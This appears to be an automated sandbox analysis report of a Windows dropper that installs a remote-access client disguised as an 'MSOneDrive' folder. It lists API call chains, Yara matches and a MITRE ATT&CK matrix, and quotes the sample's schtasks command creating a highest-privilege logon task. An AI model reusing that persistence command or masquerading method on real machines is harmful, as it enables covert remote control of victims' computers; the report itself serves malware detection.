                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1327778384.00000000010E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: client32.exe, 0000000D.00000003.1389862355.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000D.00000002.1390690669.0000000000B05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1328551007.00000000010E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1327778384.00000000010E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeAPI call chain: ExitProcess graph end nodegraph_3-10752
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-83495
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-88570
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C87884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C87884
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110AE550 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,11_2_110AE550
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11081000 LoadLibraryA,LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_11081000
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C81000 lstrcmpA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,3_2_00C81000
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C87884 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C87884
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C8D978 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C8D978
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C87A11 SetUnhandledExceptionFilter,3_2_00C87A11
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C86F73 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C86F73
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1102F520 _NSMClient32@8,SetUnhandledExceptionFilter,11_2_1102F520
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1108C020 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,11_2_1108C020
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1115C769 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1115C769
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11150781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_11150781
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1102F520 _NSMClient32@8,SetUnhandledExceptionFilter,13_2_1102F520
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1108C020 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,13_2_1108C020
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1115C769 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_1115C769
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11150781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_11150781
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: PostMessageA,GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe11_2_1102E710
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: PostMessageA,GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe13_2_1102E710
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110E9400 GetTickCount,LogonUserA,GetTickCount,GetLastError,11_2_110E9400
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C81A80 GetProcessHeap,RegOpenKeyW,lstrlenW,RegSetValueExW,RegCloseKey,GetProcessHeap,GetProcessHeap,HeapAlloc,GetSystemDirectoryW,HeapFree,GetProcessHeap,HeapAlloc,wsprintfW,GetProcessHeap,HeapAlloc,HeapFree,wsprintfW,ShellExecuteW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00C81A80
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_111058F0 GetKeyState,DeviceIoControl,keybd_event,11_2_111058F0
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHESTJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110964D0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,11_2_110964D0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11096C50 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,11_2_11096C50
                                Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drBinary or memory string: ProgmanL
                                Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drBinary or memory string: Progman
                                Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drBinary or memory string: Shell_TrayWndTraceRunpluginTimeouth^
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C87B48 cpuid 3_2_00C87B48
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,11_2_11162513
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoA,11_2_11159D6E
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_11161FE8
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,11_2_11162184
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_111621DF
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,11_2_111620DD
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_111623B0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_11162470
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_111624D7
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,11_2_6C82ECA9
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_6C82FC28
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,11_2_6C82FDF9
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: EnumSystemLocalesA,11_2_6C82FEC1
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_6C82FEE5
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,11_2_6C82FF88
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,11_2_6C82EFC7
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_6C82FF4C
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,11_2_6C83B8EF
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,11_2_6C82D84F
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,11_2_6C83B9C9
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoA,11_2_6C83BA0C
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_6C82FA31
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,13_2_11162513
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoA,13_2_11159D6E
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_11161FE8
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,13_2_11162184
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,13_2_111621DF
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,13_2_111620DD
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,13_2_111623B0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11162470
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_111624D7
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110E8280 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,11_2_110E8280
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C87771 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00C87771
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11039030 _calloc,GetUserNameA,_free,_calloc,_free,11_2_11039030
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11163293 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,11_2_11163293
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11134460 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,11_2_11134460
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110CD1D0 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,11_2_110CD1D0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1106AC40 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,11_2_1106AC40
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_6C8090A0 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,LeaveCriticalSection,GetTickCount,InterlockedExchange,11_2_6C8090A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110CD1D0 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,13_2_110CD1D0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1106AC40 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,13_2_1106AC40
                                Source: Yara matchFile source: 13.0.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.6cb70000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.6cb70000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.6cb40000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.9d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.6cb40000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.111a3f08.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7512, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts                                		14
                                Native API                                		1
                                DLL Side-Loading                                		1
                                Exploitation for Privilege Escalation                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		2
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		1
                                DLL Side-Loading                                		3
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		21
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Service Execution                                		1
                                Windows Service                                		2
                                Valid Accounts                                		1
                                Software Packing                                		Security Account Manager2
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job                                		21
                                Access Token Manipulation                                		1
                                Timestomp                                		NTDS33
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		4
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                                Windows Service                                		1
                                DLL Side-Loading                                		LSA Secrets31
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts23
                                Process Injection                                		1
                                Masquerading                                		Cached Domain Credentials1
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Virtualization/Sandbox Evasion                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron23
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
